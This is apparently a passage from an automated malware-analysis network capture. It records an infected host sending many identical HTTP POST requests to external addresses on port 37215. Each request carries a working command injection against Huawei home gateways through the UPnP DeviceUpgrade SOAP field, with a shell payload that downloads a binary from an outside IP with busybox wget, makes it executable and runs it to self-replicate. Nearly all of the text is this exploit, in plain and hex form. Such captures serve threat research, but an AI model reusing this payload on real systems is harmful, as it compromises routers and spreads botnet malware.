                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1003192.168.2.2339498157.148.92.037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270328999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1004192.168.2.2348576157.177.150.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270345926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1005192.168.2.2355826157.13.225.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270354033 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1006192.168.2.2341790197.162.174.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.270370960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1007192.168.2.235124641.245.114.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.277676105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1008192.168.2.2351092151.192.66.20237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281301022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1009192.168.2.2352628197.13.163.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281433105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1010192.168.2.235399641.122.233.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281491995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1011192.168.2.2347328157.96.182.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281585932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1012192.168.2.2345718109.19.32.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281625032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1013192.168.2.234770436.54.132.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.281656981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
